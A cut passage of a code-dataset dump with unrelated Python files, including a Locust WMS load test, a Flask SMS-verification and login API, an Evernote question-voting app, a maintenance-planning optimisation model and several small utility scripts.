}\n\n\n","repo_name":"Lucas-VY/rest-api-starwars-flask-sqlalchemy","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"31166201001","text":"import random\nimport math\nfrom locust import HttpLocust, TaskSet, task\nfrom lxml import etree\n\n\nclass WMSLayer(object):\n def __init__(self, xml_el):\n #print(etree.tostring(xml_el))\n self.name = xml_el.find('Name').text\n self.bbox = dict(xml_el.find('BoundingBox').attrib.items())\n for n in ['minx', 'maxx', 'maxy', 'miny']:\n self.bbox[n] = float(self.bbox[n])\n self.width = self.bbox['maxx'] - self.bbox['minx']\n self.height = self.bbox['maxy'] - self.bbox['miny']\n\n\nclass WMSTaskSet(TaskSet):\n default_params = {\n 'service': 'wms',\n 'version': '1.1.1',\n }\n\n def on_start(self):\n url_params = self.default_params.copy()\n url_params.update({\n 'request': 'GetCapabilities'\n })\n resp = self.client.get(\"/wms\", params=url_params, catch_response=True)\n content_type = resp.headers['content-type']\n assert content_type == 'application/vnd.ogc.wms_xml'\n\n root = etree.fromstring(resp.content)\n layers = root.xpath('//Capability/Layer/Layer')\n assert len(layers) > 0\n\n self.layers = [WMSLayer(el) for el in layers]\n #for l in self.layers:\n # print l.name\n\n @task\n def get_map(self, layer=None):\n if not layer:\n possible_layers = ['hel:Karttasarja']\n layers = [l for l in self.layers if l.name in possible_layers]\n layer = random.choice(layers)\n\n dim = 256\n img_fmt = 'image/jpeg'\n\n url_params = self.default_params.copy()\n url_params.update({\n 'request': 'GetMap',\n 'layers': layer.name,\n 'styles': '',\n 'srs': layer.bbox['SRS'],\n 'width': dim,\n 'height': dim,\n 'format': img_fmt,\n })\n\n # min spatial resolution 5cm\n min_res = 0.05\n max_res = min(layer.height, layer.width) / dim\n max_exp = math.log(max_res / min_res, 2)\n exp = random.randint(0, int(max_exp))\n res = min_res * 2**exp\n\n minx = random.uniform(layer.bbox['minx'], layer.bbox['maxx'] - res * dim)\n miny = random.uniform(layer.bbox['miny'], layer.bbox['maxy'] - res * dim)\n #max_res = min(layer.bbox['maxx'] - minx, layer.bbox['maxy'] - miny)\n #max_res /= dim\n\n maxx = minx + res * dim\n maxy = miny + res * dim\n bbox = [str(f) for f in [minx, miny, maxx, maxy]]\n url_params['bbox'] = ','.join(bbox)\n\n name = 'WMS-GetMap-%s' % layer.name\n name += '-%6sm' % ('%.2f' % res)\n args = dict(params=url_params, name=name, catch_response=True)\n with self.client.get(\"/wms\", **args) as resp:\n #print(resp.request.url)\n\n if resp.status_code != 200:\n print(\"status %d\" % resp.status_code)\n print(resp.request.url)\n return\n if resp.headers['content-type'] != img_fmt:\n resp.failure('Invalid content type')\n print(\"content type: %s\" % resp.headers['content-type'])\n print(resp.request.url)\n print(resp.content)\n return\n f = open('/tmp/locust/%s.png' % name, 'w')\n f.write(resp.content)\n f.close()\n\n\nclass WMSBench(HttpLocust):\n task_set = WMSTaskSet\n host = \"http://geoserver.hel.fi/geoserver\"\n\n # we assume someone who is browsing the Locust docs,\n # generally has a quite long waiting time (between\n # 20 and 600 seconds), since there's a bunch of text\n # on each page\n min_wait = 0\n #max_wait = 600 * 1000\n","repo_name":"City-of-Helsinki/owsbench","sub_path":"locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24275037012","text":"from algebreb.listas.listas_polinomios import ListaTermPolinomio\nfrom sympy.abc import a, b, c, x, y , z\nimport json\n\ncaracteristicas = {}\ncaracteristicas['cantidad'] = 
10\ncaracteristicas['variables'] = [a]\ncaracteristicas['dominio'] = 'QQ'\ncaracteristicas['fraccion'] = False\ncaracteristicas['gmin'] = 1\ncaracteristicas['gmax'] = 2\ncaracteristicas['cmin'] = -10\ncaracteristicas['cmax'] = 10\ncaracteristicas['completo'] = False\n\nlsp = ListaTermPolinomio(caracteristicas)\njson_object = json.dumps(lsp.as_str_latex(), indent=4)\nprint(json_object)","repo_name":"ialdaverag/algebreb","sub_path":"algebreb/listas/ejemplos/listas_polinomios/lista_term_polinomios.py","file_name":"lista_term_polinomios.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31097199752","text":"import os\nimport sys\ntry:\n from configparser import RawConfigParser\n from configparser import NoOptionError\nexcept ImportError: # Python 2\n from ConfigParser import RawConfigParser\n from ConfigParser import NoOptionError\n\n# Import Glances lib\nfrom glances.core.glances_globals import (\n appname,\n is_bsd,\n is_linux,\n is_mac,\n is_py3,\n is_windows,\n sys_prefix,\n work_path\n)\nfrom glances.core.glances_logging import logger\n\n\nclass Config(object):\n\n \"\"\"This class is used to access/read config file, if it exists.\n\n :param location: the custom path to search for config file\n :type location: str or None\n \"\"\"\n\n def __init__(self, location=None):\n self.location = location\n\n self.config_filename = 'glances.conf'\n\n self.parser = RawConfigParser()\n\n self._loaded_config_file = None\n self.load()\n\n def load(self):\n \"\"\"Load a config file from the list of paths, if it exists.\"\"\"\n for config_file in self.get_config_paths():\n if os.path.isfile(config_file) and os.path.getsize(config_file) > 0:\n try:\n if is_py3:\n self.parser.read(config_file, encoding='utf-8')\n else:\n self.parser.read(config_file)\n logger.info(\"Read configuration file '{0}'\".format(config_file))\n except UnicodeDecodeError as e:\n logger.error(\"Cannot decode configuration file '{0}': {1}\".format(config_file, e))\n sys.exit(1)\n # Save the loaded configuration file path (issue #374)\n self._loaded_config_file = config_file\n break\n\n def get_loaded_config_file(self):\n \"\"\"Return the loaded configuration file\"\"\"\n return self._loaded_config_file\n\n def get_config_paths(self):\n r\"\"\"Get a list of config file paths.\n\n The list is built taking into account of the OS, priority and location.\n\n * running from source: /path/to/glances/conf\n * per-user install: ~/.local/etc/glances (Unix-like only)\n * Linux: ~/.config/glances, /etc/glances\n * BSD: ~/.config/glances, /usr/local/etc/glances\n * Mac: ~/Library/Application Support/glances, /usr/local/etc/glances\n * Windows: %APPDATA%\\glances\n\n The config file will be searched in the following order of priority:\n * /path/to/file (via -C flag)\n * /path/to/glances/conf\n * user's local directory (per-user install settings)\n * user's home directory (per-user settings)\n * {/usr/local,}/etc directory (system-wide settings)\n \"\"\"\n paths = []\n conf_path = os.path.realpath(\n os.path.join(work_path, '..', '..', 'conf'))\n\n if self.location is not None:\n paths.append(self.location)\n\n if os.path.exists(conf_path):\n paths.append(os.path.join(conf_path, self.config_filename))\n\n if not is_windows:\n paths.append(os.path.join(os.path.expanduser('~/.local'), 'etc', appname, self.config_filename))\n\n if is_linux or is_bsd:\n paths.append(os.path.join(\n os.environ.get('XDG_CONFIG_HOME') or os.path.expanduser(\n 
'~/.config'),\n appname, self.config_filename))\n if hasattr(sys, 'real_prefix') or is_bsd:\n paths.append(\n os.path.join(sys.prefix, 'etc', appname, self.config_filename))\n else:\n paths.append(\n os.path.join('/etc', appname, self.config_filename))\n elif is_mac:\n paths.append(os.path.join(\n os.path.expanduser('~/Library/Application Support/'),\n appname, self.config_filename))\n paths.append(os.path.join(\n sys_prefix, 'etc', appname, self.config_filename))\n elif is_windows:\n paths.append(os.path.join(\n os.environ.get('APPDATA'), appname, self.config_filename))\n\n return paths\n\n def items(self, section):\n \"\"\"Return the items list of a section.\"\"\"\n return self.parser.items(section)\n\n def has_section(self, section):\n \"\"\"Return info about the existence of a section.\"\"\"\n return self.parser.has_section(section)\n\n def get_option(self, section, option):\n \"\"\"Get the float value of an option, if it exists.\"\"\"\n try:\n value = self.parser.getfloat(section, option)\n except NoOptionError:\n return\n else:\n return value\n\n def get_raw_option(self, section, option):\n \"\"\"Get the raw value of an option, if it exists.\"\"\"\n try:\n value = self.parser.get(section, option)\n except NoOptionError:\n return\n else:\n return value\n","repo_name":"kojitaniguchi/isucon-summer","sub_path":"usr/lib/python3/dist-packages/glances/core/glances_config.py","file_name":"glances_config.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6748788557","text":"'''\n Scripts creates matrices in c format and prints the reference result\n of General Matrix Multiplication\n \n usage: python gemm.py \n'''\n\nfrom pprint import pprint\nimport numpy as np\nimport sys\nimport os\n\nSIZE = 16\nRANGE = 100\nALPHA = 1\nBETA = 2\n\ndef print_Cformat(A, name=\"a\"):\n print(\"mat_t \" + name + \"[SIZE][SIZE] = \", end=\"\")\n print(\"{\", end=\"\")\n for i in range(0, A.shape[0]):\n print(\"{\", end=\"\")\n for j in range(0, A.shape[1]):\n if j != A.shape[1] - 1:\n print(f\"{A[i][j]}, \", end = \"\")\n else:\n print(A[i][-1], end=\"\")\n if i != A.shape[0] - 1:\n print(\"},\")\n else:\n print(\"}\", end=\"\")\n print(\"};\")\n print()\n \ndef cls():\n os.system('cls' if os.name=='nt' else 'clear')\n\ndef gemm(a, b, c, a1, b1):\n tmp = np.matmul(a,b)\n tmp = a1 * tmp\n c = b1 * c\n return tmp + c\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 5:\n SIZE = int(sys.argv[1])\n RANGE = int(sys.argv[2])\n ALPHA = int(sys.argv[3])\n BETA = int(sys.argv[4])\n\n # now, to clear the screen\n cls()\n\n a = np.random.randint(0, RANGE, size=(SIZE,SIZE))\n b = np.random.randint(0, RANGE, size=(SIZE,SIZE))\n #c = np.zeros((SIZE, SIZE), dtype=int)\n c = np.random.randint(0, RANGE, size=(SIZE,SIZE))\n\n a1 = ALPHA\n b1 = BETA\n\n print_Cformat(a, name=\"a\")\n print_Cformat(b, name=\"b\")\n print_Cformat(c, name=\"c\")\n print(f\"mat_t a1 = {a1};\")\n print(f\"mat_t b1 = {b1};\")\n ref = gemm(a, b, c, a1, b1)\n print_Cformat(ref, name=\"ref\")","repo_name":"Matjaz12/GEMM-FPGA","sub_path":"gemm.py","file_name":"gemm.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21422222008","text":"import builtins\nfrom io import TextIOWrapper\n\nimport pytest\nfrom mockito import mock, unstub, when, kwargs, ANY, verify\n\nfrom wg_federation.data_transformation.saver.file.text_file_configuration_saver import 
\\\n TextFileConfigurationSaver\n\n\n# pylint: disable=duplicate-code\n\n\nclass TestTextFileConfigurationSaver:\n \"\"\" Test TextFileConfigurationSaver class \"\"\"\n\n _file = None\n _non_exist_parent_path = None\n\n _pathlib_lib = None\n _os_lib = None\n _subject: TextFileConfigurationSaver = None\n\n @pytest.fixture(autouse=True)\n def run_around_tests(self):\n \"\"\" Resets mock between tests \"\"\"\n unstub()\n self.setup_method()\n\n def setup_method(self):\n \"\"\" Constructor \"\"\"\n\n self._file = mock(spec=TextIOWrapper)\n # pylint: disable=unnecessary-dunder-call\n when(self._file).__enter__().thenReturn(self._file)\n when(self._file).__exit__(...).thenReturn(None)\n when(self._file).truncate(ANY).thenReturn(None)\n when(self._file).write(ANY).thenReturn(None)\n\n _exist_path = mock()\n when(_exist_path).exists().thenReturn(True)\n\n self._non_exist_parent_path = mock()\n when(self._non_exist_parent_path).mkdir(...)\n\n _non_exist_path = mock({'parents': [self._non_exist_parent_path]})\n when(_non_exist_path).exists().thenReturn(False)\n\n self._pathlib_lib = mock()\n when(self._pathlib_lib).Path(...).thenReturn(_exist_path)\n when(self._pathlib_lib).Path('unknown.digest').thenReturn(_non_exist_path)\n\n self._os_lib = mock({'linesep': 'line'})\n\n when(builtins).open(...).thenCallOriginalImplementation()\n when(builtins).open(file='destination.digest', **kwargs).thenReturn(self._file)\n\n self._subject = TextFileConfigurationSaver(pathlib_lib=self._pathlib_lib, os_lib=self._os_lib)\n\n def test_init(self):\n \"\"\" it can be instantiated \"\"\"\n assert isinstance(self._subject, TextFileConfigurationSaver)\n\n def test_supports(self):\n \"\"\" it returns whether it supports a source or not \"\"\"\n assert True is self._subject.supports({}, '/path/to/file.DIGEST')\n assert True is self._subject.supports({}, 'file.sig')\n assert True is self._subject.supports({}, '/path/to/file.sha512')\n assert True is self._subject.supports({}, '/path/to/file.sha')\n assert False is self._subject.supports({}, '.md5')\n\n def test_supports2(self):\n \"\"\" it returns it does not support types that are not strings or file handlers \"\"\"\n assert False is self._subject.supports({}, b'invalid_bytes')\n\n def test_save_to(self):\n \"\"\" it can save configuration to a valid file destination \"\"\"\n self._subject.save_to({'signature_data': 'sign'}, self._file)\n\n verify(self._file, times=1).truncate(0)\n verify(self._file, times=1).write('sign')\n\n def test_save_to2(self):\n \"\"\" it can save configuration to a valid path destination \"\"\"\n self._subject.save_to({'signature_data': 1}, 'destination.digest')\n\n verify(self._file, times=1).truncate(0)\n verify(self._file, times=1).write('1')\n\n def test_is_initialized(self):\n \"\"\" it returns whether the destination/data is initialized \"\"\"\n assert self._subject.is_initialized({}, 'destination.digest')\n\n def test_is_initialized2(self):\n \"\"\" it returns when it is not initialized because the file does not exist \"\"\"\n assert not self._subject.is_initialized({}, 'unknown.digest')\n\n def test_initialize(self):\n \"\"\" it initializes \"\"\"\n self._subject.initialize({}, 'unknown.digest')\n\n verify(self._non_exist_parent_path, 
times=1).mkdir(...)\n","repo_name":"gui-don/python-wg-federation","sub_path":"tests/unit/wg_federation/data_transformation/saver/file/test_text_file_configuration_saver.py","file_name":"test_text_file_configuration_saver.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10672376760","text":"import solvers.model_anor as model\nimport copy\nimport pytups.tuplist as tl\nimport pytups.superdict as sd\n\n\nclass ModelANORFixLP(model.ModelANOR):\n \"\"\"\n 1. Solve LP\n 2. Get periods where the m_it > 0\n 3. Only use those for MILP\n \"\"\"\n\n def solve(self, options=None):\n my_options = copy.deepcopy(options)\n my_options['relax'] = True\n relaxed_solution = model.ModelANOR.solve(self, my_options)\n l = self.domains\n if relaxed_solution is None:\n return None\n\n # we get non-zero maintenance variables\n l['at_start_maint'] = at_free_start = \\\n sd.SuperDict.from_dict(self.start_M).\\\n vfilter(lambda v: v.value()).\\\n keys_tl()\n\n # we filter the domains corresponding to the maintenance variables values.\n # this part we have copied it from the get_domains_sets method from the model.Model object\n # this is the TTT_t set.\n # periods that are maintenance periods because of having assign a maintenance\n ret_init = self.instance.get_initial_state(\"elapsed\")\n first_period, last_period = self.instance.get_start_end()\n param_data = self.instance.get_param()\n duration = param_data['maint_duration']\n max_elapsed = param_data['max_elapsed_time'] + duration\n min_elapsed = max_elapsed - param_data['elapsed_time_size']\n ret_init_adjusted = {k: v - max_elapsed + min_elapsed for k, v in ret_init.items()}\n periods = self.instance.get_periods_range(first_period, last_period)\n p_pos = {periods[pos]: pos for pos in range(len(periods))}\n resources = self.instance.get_resources()\n min_elapsed_2M = {r: min_elapsed for r in resources}\n max_elapsed_2M = {r: max_elapsed for r in resources}\n\n l['at_M_ini'] = at_M_ini = tl.TupList([(a, t) for (a, t) in at_free_start\n if ret_init_adjusted[a] <= p_pos[t] <= ret_init[a]\n ])\n l['t_a_M_ini'] = at_M_ini.to_dict(result_col=1, is_list=True)\n l['att'] = att = tl.TupList([(a, t1, t2) for (a, t1) in at_free_start for t2 in periods\n if (p_pos[t1] <= p_pos[t2] < p_pos[t1] + duration)\n and (a, t2) in at_free_start])\n l['at1_t2'] = at1_t2 = att.to_dict(result_col=[0, 1], is_list=True)\n l['t2_at1'] = t2_at1 = att.to_dict(result_col=2, is_list=True)\n l['t_a_M_ini'] = t_a_M_ini = at_M_ini.to_dict(result_col=1, is_list=True)\n l['att_m'] = att_m = tl.TupList([(a, t1, t2) for (a, t1) in at_free_start for t2 in periods\n if (p_pos[t1] < p_pos[t2] < p_pos[t1] + min_elapsed) and (a, t2) in at_free_start\n ])\n l['att_maints_no_last'] = att_maints_no_last = \\\n tl.TupList((a, t1, t2) for (a, t1) in at_M_ini for t2 in periods\n if (p_pos[t1] + min_elapsed_2M[a] <= p_pos[t2] < p_pos[t1] + max_elapsed_2M[a])\n and len(periods) <= p_pos[t2] + max_elapsed\n and t2 < last_period\n and (a, t2) in at_free_start\n )\n l['att_M'] = att_M = \\\n att_maints_no_last.vfilter(lambda x: p_pos[x[1]] + max_elapsed < len(periods))\n\n l['t_at_M'] = t_at_M = att_M.to_dict(result_col=2, is_list=True)\n l['t1_at2'] = t1_at2 = att.to_dict(result_col=1, is_list=True).fill_with_default(l['at'], [])\n\n # now, we want to avoid recalculating domains...\n my_options = copy.deepcopy(options)\n my_options['calculate_domains'] = False\n solution = model.ModelANOR.solve(self, 
my_options)\n        return solution\n","repo_name":"pchtsp/optima","sub_path":"python/solvers/model_anor_fixingLP.py","file_name":"model_anor_fixingLP.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"12890201056","text":"import random\nimport re\nfrom datetime import datetime\n\nfrom flask import request, current_app, make_response, jsonify, session\nfrom flask_restful import Api, Resource, reqparse\n\nfrom project import db\nfrom project.libs.captcha.captcha import captcha\nfrom project.libs.yuntongxun.ccp_sms import CCP\nfrom project.models.models import User\nfrom project.utils import constants\nfrom project.utils.response_code import RET\nfrom . import verify_blueprint\n\nverify_api = Api(verify_blueprint)\n\n\nclass ImageCodeResource(Resource):\n    \"\"\"Get the image captcha\"\"\"\n    def get(self):\n        # captcha id\n        code_id = request.args.get('code_id')\n        # generate the captcha\n        text, image = captcha.generate_captcha()\n        try:\n            # save the captcha\n            current_app.redis_store.setex('img_' + code_id, constants.IMAGE_CODE_REDIS_EXPIRES, text)\n        except Exception as e:\n            current_app.logger.error(e)\n            return make_response(jsonify(errno=RET.DATAERR, errmsg='保存图形验证码失败'))\n\n        response = make_response(image)\n        response.headers['Content-Type'] = 'image/jpg'\n        return response\n\n\ndef check_mobile(value):\n\n    if not re.match(r'1[3-9]\\d{9}', value):\n        raise ValueError('手机号不正确')\n    return value\n\n\nclass SmsCodeResource(Resource):\n    \"\"\"SMS verification code\"\"\"\n    def post(self):\n\n        parse = reqparse.RequestParser()\n        parse.add_argument('mobile', location='json', required=True, type=check_mobile)\n        parse.add_argument('image_code', location='json', required=True)\n        parse.add_argument('image_code_id', location='json', required=True)\n\n        args = parse.parse_args()\n\n        mobile = args.get('mobile')\n        image_code = args.get('image_code')\n        image_code_id = args.get('image_code_id')\n\n        # fetch the sms-sent flag; a 60s window avoids frequent sms code requests\n        send_flag = current_app.redis_store.get('send_flag_%s' % mobile)\n        # check whether the sms-sent flag exists (if it exists: sms sent too frequently; otherwise the rate is normal)\n        if send_flag:\n            return jsonify(errno=RET.DATAEXIST, errmsg="发送短信过于频繁")\n\n        try:\n            server_image_code = current_app.redis_store.get('img_' + image_code_id)\n            if server_image_code:\n                server_image_code = server_image_code.decode()\n                current_app.redis_store.delete('img_' + image_code_id)\n            else:\n                return jsonify(errno=RET.NODATA, errmsg="验证码已过期")\n        except Exception as e:\n            current_app.logger.error(e)\n            return jsonify(errno=RET.DBERR, errmsg="获取图片验证码失败")\n\n        if image_code.lower() != server_image_code.lower():\n            return jsonify(errno=RET.DATAERR, errmsg="验证码输入错误")\n\n        try:\n            user = User.query.filter_by(mobile=mobile).first()\n        except Exception as e:\n            current_app.logger.error(e)\n            return jsonify(errno=RET.DBERR, errmsg="数据库查询错误")\n        if user:\n            # this phone number is already registered\n            return jsonify(errno=RET.DATAEXIST, errmsg="该手机已被注册")\n\n        # generate the sms verification code: a 6-digit number\n        sms_code = '%06d' % random.randint(0, 999999)\n        current_app.logger.info('短信验证码为:' + sms_code)\n\n        current_app.redis_store.setex('sms_%s' % mobile, constants.SMS_CODE_REDIS_EXPIRES, sms_code)\n        current_app.redis_store.setex('send_flag_%s' % mobile, constants.SEND_SMS_CODE_INTERVAL, 1)\n\n        # send the sms verification code\n        CCP().send_template_sms(mobile, [sms_code, constants.SMS_CODE_REDIS_EXPIRES // 60], 1)\n\n        return jsonify(errno=RET.OK, errmsg="发送成功")\n\n\nclass RegisterResource(Resource):\n    \"\"\"Register\"\"\"\n    def post(self):\n\n        parse = reqparse.RequestParser()\n        parse.add_argument('mobile', location='json', required=True, type=check_mobile)\n        parse.add_argument('smscode',location='json', required=True)\n        parse.add_argument('password', location='json', required=True)\n\n        args = parse.parse_args()\n\n        mobile = args.get('mobile')\n        smscode = args.get('smscode')\n        password = args.get('password')\n\n        try:\n            server_smscode = current_app.redis_store.get('sms_%s' % mobile)\n        except Exception as e:\n            current_app.logger.error(e)\n            return jsonify(errno=RET.DBERR, errmsg="获取本地验证码失败")\n\n        if not server_smscode:\n            # the sms code has expired\n            return jsonify(errno=RET.NODATA, errmsg="短信验证码过期")\n\n        if smscode != server_smscode.decode():\n            return jsonify(errno=RET.DATAERR, errmsg="短信验证码错误")\n\n        try:\n            current_app.redis_store.delete('sms_%s' % mobile)\n        except Exception as e:\n            current_app.logger.error(e)\n\n        user = User()\n        user.nick_name = mobile\n        user.mobile = mobile\n        user.password = password\n\n        try:\n            db.session.add(user)\n            db.session.commit()\n        except Exception as e:\n            db.session.rollback()\n            current_app.logger.error(e)\n            return jsonify(errno=RET.DATAERR, errmsg="数据保存错误")\n\n        # keep the login state in the session\n        session["user_id"] = user.id\n        session["nick_name"] = user.nick_name\n        session["mobile"] = user.mobile\n\n        return jsonify(errno=RET.OK, errmsg="OK")\n\n\nclass LoginResource(Resource):\n    \"\"\"Login\"\"\"\n    def post(self):\n\n        parse = reqparse.RequestParser()\n        parse.add_argument('mobile', location='json', required=True, type=check_mobile)\n        parse.add_argument('password', location='json', required=True)\n        args = parse.parse_args()\n\n        mobile = args.get('mobile')\n        password = args.get('password')\n\n        try:\n            user = User.query.filter_by(mobile=mobile).first()\n        except Exception as e:\n            current_app.logger.error(e)\n            return jsonify(errno=RET.DBERR, errmsg="查询数据错误")\n\n        if not user:\n            return jsonify(errno=RET.USERERR, errmsg="用户不存在")\n\n        if not user.check_passowrd(password):\n            return jsonify(errno=RET.PWDERR, errmsg="密码错误")\n\n        session["user_id"] = user.id\n        session["nick_name"] = user.nick_name\n        session["mobile"] = user.mobile\n\n        # logic tweak: if an admin reaches the front-end pages, the session state needs is_admin\n        if user.is_admin:\n            session['is_admin'] = True\n\n        user.last_login = datetime.now()\n\n        try:\n            db.session.commit()\n        except Exception as e:\n            current_app.logger.error(e)\n\n        return jsonify(errno=RET.OK, errmsg="OK")\n\n\nclass LogoutResource(Resource):\n    \"\"\"Logout\"\"\"\n    def post(self):\n\n        session.pop('user_id', None)\n        session.pop('nick_name', None)\n        session.pop('mobile', None)\n        session.pop('is_admin', None)\n        # return the result\n        return jsonify(errno=RET.OK, errmsg="OK")\n\n\nverify_api.add_resource(ImageCodeResource, '/image_code')\nverify_api.add_resource(SmsCodeResource, '/sms_code')\nverify_api.add_resource(RegisterResource, '/register')\nverify_api.add_resource(LoginResource, '/login')\nverify_api.add_resource(LogoutResource, '/logout')\n","repo_name":"Noah-Smith-wgp/zixun","sub_path":"project/apps/verification/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"37530154514","text":"from evernote.api.client import EvernoteClient\nfrom evernote.edam.notestore import NoteStore\nimport evernote.edam.type.ttypes as Types\nfrom evernote.edam.type.ttypes import NoteSortOrder\nfrom Question import Question\nfrom Presentation import Presentation\nimport auth\n\nclient = EvernoteClient(token = auth.dev_token) # this token will be the\n                                                # token of presenter\nNOTE_STORE = client.get_note_store()\n\ndef get_sorted_questions(guid): # guid of 
the notebook\n    questions = get_questions(guid)\n    questions.sort(key = lambda x: x.votes)\n    questions.reverse()\n    return questions\n\ndef get_questions(guid): # guid of the notebook\n    questions = []\n    noteFilter = NoteStore.NoteFilter(order=NoteSortOrder.UPDATED)\n    noteFilter.notebookGuid = guid\n    spec = NoteStore.NotesMetadataResultSpec()\n    spec.includeTitle = True\n    notes = NOTE_STORE.findNotesMetadata(auth.dev_token, noteFilter, 0 , 100, spec)\n    for note in notes.notes:\n        votes = get_votes(note.guid)\n        questions += [ Question(note.title, '', votes,note.guid, NOTE_STORE) ]\n    return questions\n\ndef get_votes(guid):\n    return int(NOTE_STORE.getNoteApplicationDataEntry(auth.dev_token, guid, \"votes\"))\n\ndef get_presentation(guid):\n    notebook_title = NOTE_STORE.getNotebook(auth.dev_token, guid).name\n    notebook_questions = get_questions(guid)\n    return Presentation(notebook_title, notebook_questions, guid)\n\ndef make_question(question_text, guid): # guid of the notebook to add to\n    note = Types.Note()\n    note.title = question_text\n    note.content = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE en-note SYSTEM \"http://xml.evernote.com/pub/enml2.dtd\">'\n    note.content += '<en-note></en-note>'\n    note.notebookGuid = guid\n    try:\n        note = NOTE_STORE.createNote(note)\n    except Exception:\n        return None\n    NOTE_STORE.setNoteApplicationDataEntry(auth.dev_token, note.guid, \"votes\", \"1\")\n    question = Question(question_text, '', 1, note.guid, NOTE_STORE)\n    return question\n\ndef make_presentation(title):\n    notebook = Types.Notebook()\n    notebook.name = title\n    try:\n        return NOTE_STORE.createNotebook(auth.dev_token, notebook).guid\n    except Exception:\n        return None\n\ndef gen_student_evernote(notebook_guid, token): # guid of the notebook containing q's\n    questions = get_sorted_questions(notebook_guid)\n    presentation = get_presentation(notebook_guid)\n    new_note_text = \"\"\n    for i in range(5 if len(questions) > 5 else len(questions)):\n        new_note_text += \"\" + questions[i].question + \" (\" + str(questions[i].votes) + \" votes)\"\n    note = Types.Note()\n    note.title = 'Top Questions from ' + presentation.title\n    note.content = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE en-note SYSTEM \"http://xml.evernote.com/pub/enml2.dtd\">'\n    note.content += '<en-note>' + new_note_text + '</en-note>'\n    client = EvernoteClient(token=token)\n    student_note_store = client.get_note_store()\n    student_note_store.createNote(token, note)\n\ndef get_question_by_guid(guid):\n    note = NOTE_STORE.getNote(auth.dev_token, guid, False, False, False, False)\n    return Question(note.title, '', get_votes(guid), guid, NOTE_STORE)\n","repo_name":"kklin/quak","sub_path":"quak/quakapp/Quak.py","file_name":"Quak.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"39438852249","text":"\n\nfrom ast import arg\nimport json\nimport os\nfrom random import shuffle\nfrom sys import path\n\n\n\ndef build_json(args):\n    if args.n_keyword == 35:\n        vocab = ['yes', 'no', 'up', 'down', 'left', 'right', 'on', 'off', 'stop', 'go',\n                'zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine',\n                'bed', 'bird', 'cat', 'dog', 'happy', 'house', 'marvin', 'sheila', 'tree', 'wow',\n                'backward', 'forward', 'follow', 'learn', 'visual']\n    elif args.n_keyword == 12:\n        vocab = ['yes', 'no', 'up', 'down', 'left', 'right', 'on', 'off', 'stop', 'go','unknown','silence']\n    else:\n        raise ValueError(\"Number of keywords must be 35 or 12\")\n    # open the training, validation, testing and background lists\n    with open(os.path.join(args.data_dir,'training_list.txt'),'r') as training_list:\n        training_set = [line.strip('\\n') for line in training_list]\n    with open(os.path.join(args.data_dir,'validation_list.txt'),'r') as validation_list:\n        validation_set = [line.strip('\\n') for line in validation_list]\n    with open(os.path.join(args.data_dir,'testing_list.txt'),'r') as testing_list:\n        testing_set = [line.strip('\\n') for line in testing_list] \n    with open(os.path.join(args.data_dir,'background_list.txt'),'r') as background_list:\n        background_set = [line.strip('\\n') for line in background_list] \n\n    print(len(training_set) ,len(validation_set), len(testing_set), len(background_set))\n    print(f\"Building json files for {args.n_keyword} keywords\")\n\n    # create the json files\n    ftrain = open(os.path.join(args.data_dir,'train'+'_'+ str(args.n_keyword)+'.json'),'w')\n    fval = open(os.path.join(args.data_dir,'validation'+'_'+ str(args.n_keyword)+'.json'),'w')\n    ftest = open(os.path.join(args.data_dir,'test'+'_'+ str(args.n_keyword)+'.json'),'w')\n    fnoise = open(os.path.join(args.data_dir,'noise.json'),'w')\n    freverb = open(os.path.join(args.data_dir,'reverb.json'),'w')\n\n    # write the contents of the json files\n    for word in vocab:\n        if word == 'unknown':\n            unknown_word = ['backward', 'bed', 'bird', 'cat', 'dog',\n                    'eight', 'five', 'follow', 'forward', 'four',\n                    'happy', 'house', 'learn', 'marvin', 'nine',\n                    'one', 'seven', 'sheila', 'six', 'three',\n                    'tree', 'two', 'visual', 'wow', 'zero']\n\n            for unk_word in unknown_word:\n                count = 0\n                for line in training_set:\n                    if unk_word + '/' in line:\n                        dir = os.path.join(os.path.join(args.data_dir,line))\n                        json_dict = {'file':dir,'text':word}\n                        json.dump(json_dict,ftrain)\n                        ftrain.write('\\n')\n                        count += 1\n                        if count == 120:\n                            break\n            for unk_word in unknown_word:\n                count = 0\n                for line in validation_set:\n                    if unk_word + '/' in line:\n                        dir = os.path.join(os.path.join(args.data_dir,line))\n                        json_dict = {'file':dir,'text':word}\n                        json.dump(json_dict,fval)\n                        fval.write('\\n')\n                        count += 1\n                        if count == 15:\n                            break \n\n            for unk_word in unknown_word:\n                count = 0\n                for line in 
